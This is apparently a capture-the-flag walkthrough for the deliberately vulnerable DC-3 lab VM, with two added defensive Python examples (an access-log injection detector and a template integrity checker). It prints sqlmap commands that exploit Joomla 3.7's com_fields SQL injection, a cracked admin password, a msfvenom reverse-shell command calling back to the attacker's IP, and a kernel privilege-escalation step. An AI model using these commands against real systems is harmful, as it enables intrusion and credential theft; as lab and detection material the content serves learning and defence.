01 Environment setup
- Target VM download: https://www.vulnhub.com/entry/dc-3,312/
- The challenge description is as follows:
Description
DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
As with the previous DC releases, this one is designed with beginners in mind, although this time around, there is only one flag, one entry point and no clues at all.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.
For those with experience doing CTF and Boot2Root challenges, this probably won't take you long at all (in fact, it could take you less than 20 minutes easily).
If that's the case, and if you want it to be a bit more of a challenge, you can always redo the challenge and explore other ways of gaining root and obtaining the flag.
Technical Information
DC-3 is a VirtualBox VM built on Ubuntu 32 bit, so there should be no issues running it on most PCs.
Please note: There was an issue reported with DC-3 not working with VMware Workstation. To get around that, I recommend using VirtualBox, however, I have created a separate DC-3 VMware edition for those who can only use VMware.
It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.
Installation is simple - download it, unzip it, and then import it into VirtualBox and away you go.
Important
While there should be no problems using this VM, by downloading it, you accept full responsibility for any unintentional damage that this VM may cause.
In saying that, there shouldn't be any problems, but I feel the need to throw this out there just in case.
Contact
I'm also very interested in hearing how people go about solving these challenges, so if you're up for writing a walkthrough, please do so and send me a link, or alternatively, follow me on Twitter, and DM me (you can unfollow after you've DM'd me if you'd prefer).
I can be contacted via Twitter - @DCAU7
02 Information Collection
Import the target VM into VirtualBox and start it; the first step is information gathering.
Finding the target
The attacking machine's IP address is 192.168.56.1 (the VM was imported with a Host-Only Adapter).
Use nmap to scan the subnet for live hosts:
nmap -sP 192.168.56.1/24
The scan finds 192.168.56.18, the target's IP address.
Port Scan
Use nmap to scan the target for open ports:
nmap -Pn -n -sV 192.168.56.18
The target has only TCP port 80 open.
Web framework
Visiting the web page shows a hint that there is only one flag.
The nmap scan reports that the site runs Joomla!.
A dirb scan reveals the backend login page at http://192.168.56.18/administrator/.
Accessing README.txt shows that the version is 3.7.
Searching exploitdb shows that this version has a SQL injection vulnerability.
03 Obtaining an account
Use sqlmap to enumerate the databases on the target:
sqlmap -u "http://192.168.56.18/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --dbs --batch
You can also first confirm that this URL is injectable before enumerating tables:
sqlmap -u "http://192.168.56.18/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --batch
A database named joomladb is found. Enumerate its tables:
sqlmap -u "http://192.168.56.18/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb --tables --batch
The results include a #__users table; enumerate its columns:
sqlmap -u "http://192.168.56.18/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb -T "#__users" --columns --batch
The Python interactive prompt is a bit of a problem here: answering y to "do you want to use common column existence check?" does not return the column names.
Guess the column names instead and dump the account name and password hash:
sqlmap -u "http://192.168.56.18/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb -T "#__users" -C name,password --dump --batch
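The injection above lives in the list[fullordering] parameter of com_fields, and sqlmap sends many requests with SQL functions such as updatexml in that parameter. The following added example (not from the original walkthrough) scans constructed Apache access-log lines for that pattern, flagging any com_fields request whose ordering value is not a plain column name with an optional ASC/DESC; the log lines, IPs and timestamps are made up for the demonstration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined format); not from the original page.
SAMPLE_LOG = """\
192.168.56.1 - - [10/May/2017:10:00:01 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.56.1 - - [10/May/2017:10:00:05 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,version(),1) HTTP/1.1" 500 812 "-" "sqlmap/1.1"
192.168.56.1 - - [10/May/2017:10:00:06 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=extractvalue%281%2Cversion%28%29%29 HTTP/1.1" 500 812 "-" "sqlmap/1.1"
192.168.56.20 - - [10/May/2017:10:01:00 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=a.ordering+ASC HTTP/1.1" 200 2200 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# A legitimate Joomla ordering value is a column name with an optional direction, e.g. "a.ordering ASC".
SAFE_ORDERING = re.compile(r'^[A-Za-z_][A-Za-z0-9_.]*(\s+(ASC|DESC))?$', re.IGNORECASE)
# SQL functions that never belong in an ordering value; a bare function name is already suspicious.
SQL_FUNCS = re.compile(r'\b(updatexml|extractvalue|concat|sleep|benchmark)\b', re.IGNORECASE)


def is_com_fields_injection(path: str) -> bool:
    """True if the request targets com_fields with a non-ordering value in list[fullordering]."""
    # parse_qs percent-decodes both keys and values, so list%5Bfullordering%5D is handled too.
    qs = parse_qs(urlsplit(path).query, keep_blank_values=True)
    if qs.get("option", [""])[0] != "com_fields":
        return False
    for value in qs.get("list[fullordering]", []):
        value = value.strip()
        if SQL_FUNCS.search(value) or not SAFE_ORDERING.match(value):
            return True
    return False


def scan_access_log(text: str) -> list:
    """Return (ip, timestamp, status) for every line that looks like a com_fields injection attempt."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and is_com_fields_injection(m["path"]):
            hits.append((m["ip"], m["ts"], m["status"]))
    return hits


def suspicious_sources(hits: list) -> Counter:
    """Count flagged requests per source IP; sqlmap runs produce many hits from one address."""
    return Counter(ip for ip, _, _ in hits)


if __name__ == "__main__":
    found = scan_access_log(SAMPLE_LOG)
    for ip, ts, status in found:
        print(f"{ts} {ip} status={status} com_fields ordering injection")
    print(suspicious_sources(found))
```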
Use john to crack the hash; the plaintext password is snoopy.
04 Getting a shell
Log in to http://192.168.56.18/administrator with the admin account. The template PHP files can be edited from inside the backend, and these templates are reachable from outside.
Edit the index.php file of the Beez3 template: use msfvenom to generate a reverse shell and paste it into index.php.
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f raw > shell.php
Then start a listener in msfconsole.
Any other webshell would also work.
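The shell above is obtained by editing a template file through the Joomla backend, so the file on disk changes. The following added example (not from the original walkthrough) shows a minimal integrity check for a templates directory: hash every PHP file, then compare a later snapshot against the baseline. The directory tree and file contents are constructed in a temporary folder and are hypothetical, not the real Beez3 files.

```python
import hashlib
import tempfile
from pathlib import Path


def hash_php_files(root: Path) -> dict:
    """Map each .php file (path relative to root, POSIX style) to its SHA-256 digest."""
    return {
        p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(root.rglob("*.php"))
    }


def diff_baseline(baseline: dict, current: dict) -> dict:
    """Report template files that changed, appeared or disappeared since the baseline."""
    return {
        "modified": sorted(k for k in baseline if k in current and baseline[k] != current[k]),
        "added": sorted(k for k in current if k not in baseline),
        "removed": sorted(k for k in baseline if k not in current),
    }


def demo() -> dict:
    """Build a constructed templates tree, take a baseline, simulate a backend edit, and diff."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "beez3").mkdir()
        (root / "beez3" / "index.php").write_text("<?php // constructed original template\n")
        (root / "beez3" / "error.php").write_text("<?php // constructed error page\n")
        baseline = hash_php_files(root)
        # Simulate the edit described above: the template's index.php is overwritten
        # and a new PHP file is dropped next to it.
        (root / "beez3" / "index.php").write_text("<?php // constructed modified template\n")
        (root / "beez3" / "extra.php").write_text("<?php // constructed new file\n")
        return diff_baseline(baseline, hash_php_files(root))


if __name__ == "__main__":
    for kind, files in demo().items():
        print(f"{kind}: {files}")
```

In practice the baseline is taken right after installation or an update and stored off the web server, so a later diff shows exactly which template files an attacker with backend access touched.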
05 Privilege escalation
After obtaining the reverse shell, a search for SUID binaries finds nothing usable for privilege escalation.
Check the Linux kernel version and search for a kernel exploit.
A script can identify vulnerabilities present in the current kernel.
CVE-2016-4557 succeeds in escalating privileges, giving the final flag.